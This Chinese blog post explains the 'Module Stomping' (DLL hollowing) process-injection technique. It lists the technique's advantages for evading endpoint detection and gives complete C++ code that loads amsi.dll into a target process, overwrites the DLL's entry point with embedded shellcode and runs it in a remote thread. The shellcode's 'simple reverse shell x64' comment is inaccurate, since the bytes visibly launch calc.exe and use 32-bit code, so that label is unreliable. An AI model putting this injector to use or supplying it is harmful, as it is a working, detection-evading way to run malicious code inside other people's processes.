首页 > 其他分享 >注入—Module Stomping注入

注入—Module Stomping注入

时间:2023-01-03 22:56:02浏览次数:49  
标签:0x8B Stomping 0x00 0x01 Module DLL processHandle 0xFF 注入

Module Stomping注入

Module Stomping(又称为Module Overloading,又称为DLL Hollowing)技术

工作原理:将一些正常DLL注入到目标进程中,寻找

AddressOfEntryPoint,并使用Shellcode覆盖AddressOfEntryPoint指向的内容,并为该DLL创建一个新线程,并启动该线程。

优点如下:

1、不需要申请RWX内存页,或者更改权限

2、shellcode是将合法dll进行注入,而不是恶意dll,可以绕过C:\temp\等主防检测路径

3、执行shellcode的远程线程与合法的windows模块关联,恶意值下降

缺点:

1、ReadProcessMemory和writeProcessMemory函数比较敏感。

 


#include <iostream>
#include <Windows.h>
#include <psapi.h>

int main(int argc, char* argv[])
{
	HANDLE processHandle;
	PVOID remoteBuffer;
	wchar_t moduleToInject[] = L"C:\\windows\\system32\\amsi.dll";
	HMODULE modules[256] = {};
	SIZE_T modulesSize = sizeof(modules);
	DWORD modulesSizeNeeded = 0;
	DWORD moduleNameSize = 0;
	SIZE_T modulesCount = 0;
	CHAR remoteModuleName[128] = {};
	HMODULE remoteModule = NULL;

	// simple reverse shell x64
	unsigned char shellcode[] = {
		0xFC, 0xE8, 0x82, 0x00, 0x00, 0x00, 0x60, 0x89, 0xE5, 0x31, 0xC0, 0x64, 0x8B, 0x50, 0x30, 0x8B,
		0x52, 0x0C, 0x8B, 0x52, 0x14, 0x8B, 0x72, 0x28, 0x0F, 0xB7, 0x4A, 0x26, 0x31, 0xFF, 0xAC, 0x3C,
		0x61, 0x7C, 0x02, 0x2C, 0x20, 0xC1, 0xCF, 0x0D, 0x01, 0xC7, 0xE2, 0xF2, 0x52, 0x57, 0x8B, 0x52,
		0x10, 0x8B, 0x4A, 0x3C, 0x8B, 0x4C, 0x11, 0x78, 0xE3, 0x48, 0x01, 0xD1, 0x51, 0x8B, 0x59, 0x20,
		0x01, 0xD3, 0x8B, 0x49, 0x18, 0xE3, 0x3A, 0x49, 0x8B, 0x34, 0x8B, 0x01, 0xD6, 0x31, 0xFF, 0xAC,
		0xC1, 0xCF, 0x0D, 0x01, 0xC7, 0x38, 0xE0, 0x75, 0xF6, 0x03, 0x7D, 0xF8, 0x3B, 0x7D, 0x24, 0x75,
		0xE4, 0x58, 0x8B, 0x58, 0x24, 0x01, 0xD3, 0x66, 0x8B, 0x0C, 0x4B, 0x8B, 0x58, 0x1C, 0x01, 0xD3,
		0x8B, 0x04, 0x8B, 0x01, 0xD0, 0x89, 0x44, 0x24, 0x24, 0x5B, 0x5B, 0x61, 0x59, 0x5A, 0x51, 0xFF,
		0xE0, 0x5F, 0x5F, 0x5A, 0x8B, 0x12, 0xEB, 0x8D, 0x5D, 0x6A, 0x01, 0x8D, 0x85, 0xB2, 0x00, 0x00,
		0x00, 0x50, 0x68, 0x31, 0x8B, 0x6F, 0x87, 0xFF, 0xD5, 0xBB, 0xF0, 0xB5, 0xA2, 0x56, 0x68, 0xA6,
		0x95, 0xBD, 0x9D, 0xFF, 0xD5, 0x3C, 0x06, 0x7C, 0x0A, 0x80, 0xFB, 0xE0, 0x75, 0x05, 0xBB, 0x47,
		0x13, 0x72, 0x6F, 0x6A, 0x00, 0x53, 0xFF, 0xD5, 0x63, 0x61, 0x6C, 0x63, 0x2E, 0x65, 0x78, 0x65,
		0x00
	};

	// inject a benign DLL into remote process
	processHandle = OpenProcess(PROCESS_ALL_ACCESS, FALSE, DWORD(atoi(argv[1])));
	//processHandle = OpenProcess(PROCESS_ALL_ACCESS, FALSE, 8444);

	remoteBuffer = VirtualAllocEx(processHandle, NULL, sizeof moduleToInject, MEM_COMMIT, PAGE_READWRITE);
	WriteProcessMemory(processHandle, remoteBuffer, (LPVOID)moduleToInject, sizeof moduleToInject, NULL);
	PTHREAD_START_ROUTINE threadRoutine = (PTHREAD_START_ROUTINE)GetProcAddress(GetModuleHandle(TEXT("Kernel32")), "LoadLibraryW");
	HANDLE dllThread = CreateRemoteThread(processHandle, NULL, 0, threadRoutine, remoteBuffer, 0, NULL);
	WaitForSingleObject(dllThread, 1000);

	// find base address of the injected benign DLL in remote process
	EnumProcessModules(processHandle, modules, modulesSize, &modulesSizeNeeded);
	modulesCount = modulesSizeNeeded / sizeof(HMODULE);
	for (size_t i = 0; i < modulesCount; i++)
	{
		remoteModule = modules[i];
		GetModuleBaseNameA(processHandle, remoteModule, remoteModuleName, sizeof(remoteModuleName));
		if (std::string(remoteModuleName).compare("amsi.dll") == 0)
		{
			std::cout << remoteModuleName << " at " << modules[i];
			break;
		}
	}

	// get DLL's AddressOfEntryPoint
	DWORD headerBufferSize = 0x1000;
	LPVOID targetProcessHeaderBuffer = HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, headerBufferSize);
	ReadProcessMemory(processHandle, remoteModule, targetProcessHeaderBuffer, headerBufferSize, NULL);

	PIMAGE_DOS_HEADER dosHeader = (PIMAGE_DOS_HEADER)targetProcessHeaderBuffer;
	PIMAGE_NT_HEADERS ntHeader = (PIMAGE_NT_HEADERS)((DWORD_PTR)targetProcessHeaderBuffer + dosHeader->e_lfanew);
	LPVOID dllEntryPoint = (LPVOID)(ntHeader->OptionalHeader.AddressOfEntryPoint + (DWORD_PTR)remoteModule);
	std::cout << ", entryPoint at " << dllEntryPoint;

	// write shellcode to DLL's AddressofEntryPoint
	WriteProcessMemory(processHandle, dllEntryPoint, (LPCVOID)shellcode, sizeof(shellcode), NULL);

	// execute shellcode from inside the benign DLL
	CreateRemoteThread(processHandle, NULL, 0, (PTHREAD_START_ROUTINE)dllEntryPoint, NULL, 0, NULL);

	return 0;
}

 

标签:0x8B,Stomping,0x00,0x01,Module,DLL,processHandle,0xFF,注入
From: https://www.cnblogs.com/wuruixin/p/17023615.html

相关文章

  • 注入——APC Early Bird注入
    1、创建傀儡进程2、申请一段内存空间,写入Shellcode3、QueueUserAPC添加APC队列4、ResumeThread激活进程 #include<Windows.h>intmain(){ unsignedcharbuf[]......
  • Thread Hijacking注入
    通过线程劫持,注入远程进程1、通过PID打开目标进程,并申请一段空间,写入shellcode2、拍摄快照,遍历进程,打开ID3、挂起该进程,保存线程变量,设置上下文为我们希望执行的Shellco......
  • 注入——ProceHolling傀儡进程注入
    ProceHolling傀儡进程注入1、CreateProcess创建傀儡进程2、UnmapViewOfSection卸载傀儡进程的内存映射3、CreateFile+ReadFile读取进程24、WriteProcessMemory将HEADER......
  • Failed to fetch dynamically imported module报错
    Vue3+Vite做动态路由的时候:之前的引入方式是: letobj={path:v.path,name:v.name,icon:v.icon,component:import(`${v.component}`),children:s......
  • RestTemplate Module|休息模板模块
    2.1引言Spring的RestTemplate是一个健壮的、流行的基于Java的REST客户端。SpringforAndroidRestTemplateModule提供了一个在Android环境中工作的RestTempla......
  • 注入——AddressOfEntryPoint入口点注入
    通过修改进程入口点,进行Shellcode注入。1、首先使用CreateProcess函数创建进程,并且将参数填写为CREATE_SUSPENDED这代表新进程的主线程被挂起了2、然后定位AddressOfEntr......
  • SQL注入之查询方式和报错盲注
    当进行SQL注入时,有很多注入会出现无回显的情况,其中不回显的原因可能就是SQL语句查询方式的问题导致,这个时候我们需要用到相关的报错或盲注进行后续操作,同时作为手工注入时,......
  • SQL注入之Oracle,mongoDB等注入
    常见数据库:access、mysql、mssql、MongoDB、postgresql、sqlite、oracle、sybase等Access是没有库之分,比其他数据库低一个等级。目前在市面上的access已经很少了,和asp语言......
  • SQL注入之二次加解密,DNS等注入
    二次注入原理(主要分为两步)第一步:插入恶意数据第一次进行数据库插入数据的时候。仅仅对其中的特殊字符进行了转义,在写入数据库的时候还是保留了原来的数据,但是数据本身包......
  • SQL堆叠注入及waf绕过注入;SQL注入之SQLMAP绕过WAF
    堆叠查询注入Stackedinjections(堆叠注入)从名词的含义就可以看到应该是一堆sql语句(多条)一起执行。而在真实的运用中也是这样的,我们知道在mysql中,主要是命令......